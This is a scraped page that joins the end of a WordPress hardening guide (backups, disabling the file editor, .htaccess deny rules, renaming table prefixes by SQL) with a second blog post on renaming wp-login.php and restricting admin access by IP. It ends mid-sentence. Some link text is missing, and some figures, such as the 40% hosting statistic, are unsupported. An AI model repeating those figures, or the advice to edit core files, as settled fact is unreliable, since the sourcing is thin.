Other popular plugins to enhance WordPress security:

  • BulletProof Security – Unlike WordFence, which we talked about earlier, BulletProof does not scan your files, but it does provide you with a firewall, database protection, etc. A distinctive feature is the ability to configure and install the plugin in a few mouse clicks.
  • Sucuri Security – This plugin protects you from DDoS attacks, maintains a blacklist, scans your site for malware and manages your firewall. When something is discovered, you will be notified via email. Google, Norton, McAfee – this plugin checks all the blacklists from these vendors. You can find a complete guide about installing plugins for a WordPress site.

Step 7 – Transfer the site to a more secure hosting

This advice may seem strange, but statistics show that more than 40% of WordPress sites have been hacked due to security holes in their hosting account. These statistics should encourage you to move WordPress to a more secure hosting. Some key facts to keep in mind when choosing a new hosting:

  • If it is shared hosting, make sure that your account is isolated from other users and there is no risk of infection from other sites on the server.
  • The hosting has an automatic backup function.
  • The server has a third-party firewall and scanning tool.

Step 8 – Back up your data as often as possible

Even the biggest websites get hacked every day, despite the fact that their owners spend thousands on improving WordPress security.

If you follow best practices on this matter and have applied the tips in this article, you will still need to back up your site regularly.

There are several ways to create a backup. For example, you can manually download the site files and export the database, or use the tools offered by your hosting company. Another way is to use WordPress plugins. The most popular of them:

You can even automate the process of creating and storing WordPress backups in Dropbox.

Step 9 – Turning Off File Editing

As you probably know, WordPress has a built-in editor that allows you to edit PHP files. This feature is as useful as it can be harmful. If hackers gain access to your control panel, the first thing they will notice is the file editor. Some WordPress users prefer to turn this feature off completely. It can be turned off by editing the file wp-config.php and adding the following code there:

define('DISALLOW_FILE_EDIT', true);

That's all you need to disable this feature in WordPress.

IMPORTANT! If you want to re-enable this feature, use an FTP client or your hosting's file manager and remove this line from the file wp-config.php.

Step 10 – Removing Unused Templates and Plugins

Clean up your WordPress site and remove all unused templates and plugins. Hackers often use disabled and outdated templates and plugins (even official WordPress plugins) to gain access to your control panel, or upload malicious content to your server. By removing plugins and templates that you stopped using (and perhaps forgot to update) a long time ago, you reduce risks and make your WordPress site more secure.

Step 11 – Using .htaccess to Improve WordPress Security

.htaccess is the file WordPress needs for its links (permalinks) to work correctly. Without the correct entries in the .htaccess file, you will receive a lot of 404 errors.

Not many users know that .htaccess can be used to improve WordPress security. For example, you can block access or disable PHP execution in certain folders. Below are examples of how you can use .htaccess to improve the security of your WordPress site.

IMPORTANT! Before you make changes to the file, make a backup of your old .htaccess file. For this you can use or .

Denying access to the WordPress admin area

The code below will allow you to access the WordPress admin area only from certain IPs.

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "WordPress Admin Access Control"
AuthType Basic
order deny,allow
deny from all
allow from xx.xx.xx.xxx
allow from xx.xx.xx.xxx

Note that you need to replace xx.xx.xx.xxx with your own IP address. You can use this site to check your current IP. If you manage your WordPress site from more than one connection, add a separate allow line for each address (as many as you need). This code is not recommended if you have a dynamic IP address.

Disable PHP execution in certain folders

Hackers love to upload backdoor scripts to the WordPress uploads folder. By default, this folder is used only for storing media files, so it should never contain PHP files. You can easily disable PHP execution there by creating a new .htaccess file in /wp-content/uploads/ with these rules:

<Files *.php>
deny from all
</Files>

Protecting the wp-config.php file

The wp-config.php file contains the core WordPress settings and MySQL database details. Hence, it is the most important file in WordPress. Therefore, it most often becomes the main target of WordPress hackers. However, you can easily secure it using the following rules in .htaccess:

<Files wp-config.php>
order allow,deny
deny from all
</Files>

Step 12 – Changing Default WordPress Database Prefixes to Prevent SQL Injection

The WordPress database contains and stores all the key information necessary for the operation of your website. As a result, it becomes another target for hackers and spammers who run automated code to carry out SQL injection. When installing WordPress, many people don't bother changing the default database prefix wp_. According to WordFence, 1 in 5 WordPress hacks involve SQL injection. Because wp_ is the default value, it is the first one hackers try. In this step, we will briefly look at how to protect a WordPress site from this type of attack.

Changing the table prefix for an existing WordPress site

Part One – Changing the prefix in wp-config.php

Find your file wp-config.php using or find the line with the value $table_prefix.

You can add additional numbers, letters, or underscores. After that, save your changes and move on to the next step. In this tutorial, we are using wp_1secure1_ as the new table prefix.

While you are in your wp-config.php file, also note the name of your database so you know which one to change. Look for the define('DB_NAME', ...) line.

Part Two - Updating All Database Tables

Now you need to update all the records in your database. This can be done using phpMyAdmin.

Find the database defined in the first part and log into it.

By default, a WordPress installation has 12 tables and each one needs to be updated. However, this can be done faster by using the SQL section of phpMyAdmin.

Changing each table manually would take a huge amount of time, so we use SQL queries to speed up the process. Use the following syntax to update all tables in your database:

RENAME TABLE `wp_commentmeta` TO `wp_1secure1_commentmeta`;
RENAME TABLE `wp_comments` TO `wp_1secure1_comments`;
RENAME TABLE `wp_links` TO `wp_1secure1_links`;
RENAME TABLE `wp_options` TO `wp_1secure1_options`;
RENAME TABLE `wp_postmeta` TO `wp_1secure1_postmeta`;
RENAME TABLE `wp_posts` TO `wp_1secure1_posts`;
RENAME TABLE `wp_terms` TO `wp_1secure1_terms`;
RENAME TABLE `wp_termmeta` TO `wp_1secure1_termmeta`;
RENAME TABLE `wp_term_relationships` TO `wp_1secure1_term_relationships`;
RENAME TABLE `wp_term_taxonomy` TO `wp_1secure1_term_taxonomy`;
RENAME TABLE `wp_usermeta` TO `wp_1secure1_usermeta`;
RENAME TABLE `wp_users` TO `wp_1secure1_users`;

Some WordPress templates or plugins can add additional tables to the database. In case you have more than 12 tables in the MySQL database, add the remaining ones manually in the SQL query and execute it.

Part Three - Checking Options and Custom Metadata Tables

Depending on the number of plugins you have installed, some values in your database will need to be updated manually. This can be done by running separate SQL queries on the options and usermeta tables.

For the options table, you should use:

SELECT * FROM `wp_1secure1_options` WHERE `option_name` LIKE '%wp_%';

For the usermeta table, you should use:

SELECT * FROM `wp_1secure1_usermeta` WHERE `meta_key` LIKE '%wp_%';

When you get the query results, update every value that still carries wp_ to your new prefix. In the usermeta table the field to edit is meta_key, whereas in the options table you need to change the value of option_name.

Securing New WordPress Installs

If you plan to install new WordPress sites, you do not need to go through this process again. You can easily change WordPress table prefixes during the installation process:

Congratulations! You have successfully improved your database's security against SQL injection.

Conclusion

Even though WordPress is the most hacked CMS in the world, improving its security is not that difficult. In this guide, we've shared 12 tips you should follow to keep your WordPress security up to par.

Author

Elena has a professional technical education in the field of information technology and experience in programming in different languages for different platforms and systems. She has devoted more than 10 years to the web industry, working with various CMSs, such as Drupal, Joomla, Magento and, of course, the most popular content management system these days – WordPress. Her articles are always technically verified and accurate, be it a review for WordPress or instructions for setting up your VPS server.


Just a year ago, my server load very often exceeded the limit allowed by my tariff. Moreover, the problem was not in the sites themselves, but in a plain attack by attackers on the admin panel, trying to gain access for purposes of their own.

Today I will tell you how I dealt with the problem, which I advise you to do yourself as well, just in case.

As a result, it was decided to change the address of the login form in the admin panel, as well as close the admin panel for all strangers who do not have my IP.

It is worth noting that some hosting companies automatically create a new admin address for all their users. If you use such a hosting service, you can skip the rest of this article and not waste your time.

How to change WordPress admin address

I previously published such an article. There seems to be a similar result here, but the effect and purpose are different.

Don't forget to make backup copies of the files you work with.

  • First, copy the wp-login.php file from the root of the site (where wp-config.php is located) via ftp to your computer.
  • Rename it as you please. For example vhod.php
  • Open this file with the free Notepad++ program (or whatever editor is more convenient for you) and replace all occurrences of the phrase wp-login.php with vhod.php.

You can quickly do this by pressing CTRL+F in Notepad++. Well, in the window that appears, enter:

So in a second I replaced the occurrence of the phrase I needed in the entire file. It came across 12 times.

Upload the new file via FTP.

A similar thing needs to be done in the general-template.php file, which you will find in the wp-includes folder on the same FTP server. That is, change the occurrences of the phrase wp-login.php to vhod.php, but do not rename the file itself!

Now, in the root of the site you also have a .htaccess file. Copy it to your computer as well and open it for editing (a regular Windows Notepad will do). Insert the piece of code that blocks everyone's access to the wp-login.php file:

<Files wp-login.php>
Order Deny,Allow
Deny from all
</Files>

It was this step that relieved the server load and also hid the authorization form. The load was relieved by inserting the code above into .htaccess: a request to http://site.ru/wp-login.php now gets a 403 error rather than a 404.

To briefly recap the procedure:

  • Rename the wp-login.php file to an arbitrary name and replace the occurrences of the old name with the new one.
  • Similarly, in the general-template.php file, replace the old name wp-login.php with the new one.
  • In the .htaccess file, add a rule that denies everyone access to wp-login.php.

After updating WordPress, all that needs to be corrected again is the general-template.php file. But since the engine is not updated very often, this is a small thing compared to the effect.

We set a restriction on logging in via IP via .htaccess

As an additional measure to protect the site, I adopted a restriction on logging into the admin panel by IP. The problem was solved very simply: create an empty .htaccess file and add the following code to it:

order deny,allow
allow from 192.168.0.1
deny from all

Save the file and place it in the wp-admin folder, which is also in the root of the site.

Instead of my IP from the example, put your real one. Moreover, you can add several IPs with a new line each:

order deny,allow
allow from 126.142.40.16
allow from 195.234.69.6
deny from all
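As an added example (not from either article), the same restrictions written in the Apache 2.4 `Require` syntax: the wp-admin allow-list above together with the "Denying access to the WordPress admin area", "Disable PHP execution" and "Protecting the wp-config.php file" rules from Step 11. The addresses 203.0.113.10 and 198.51.100.0/24 are documentation-range placeholders; on Apache 2.4 the older order/deny/allow lines only keep working while mod_access_compat is loaded, and they are not mixed with the directives below.

```apache
# Added example, not from the articles above: Apache 2.4 (mod_authz_core) forms
# of the .htaccess rules. Addresses are placeholders; put your own in their place.

# --- wp-admin/.htaccess -------------------------------------------------------
# Only the listed addresses may open the dashboard. A partial address such as
# "Require ip 203.0.113" or a CIDR range covers a provider's whole block, which is
# the dynamic-IP case; everyone else receives 403.
<RequireAny>
    Require ip 203.0.113.10
    Require ip 198.51.100.0/24
</RequireAny>
# Front-end plugins and themes call admin-ajax.php for ordinary visitors, so it
# is opened back up; without this exception those features break for anyone
# outside the list.
<Files admin-ajax.php>
    Require all granted
</Files>

# --- wp-content/uploads/.htaccess ---------------------------------------------
# Refuse every extension PHP might be configured to handle, not only *.php, so
# an uploaded script cannot be run regardless of its suffix.
<FilesMatch "\.(php[0-9]?|phtml|phar)$">
    Require all denied
</FilesMatch>

# --- .htaccess in the site root -----------------------------------------------
# wp-config.php is never served over HTTP, even if PHP handling is misconfigured.
<Files wp-config.php>
    Require all denied
</Files>
```

Each section goes into the .htaccess file of the directory named in its comment, and `Require` directives need AllowOverride AuthConfig (or All) for that directory.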

If the IP is dynamic, then you can put numbers only up to the first, second or third dot: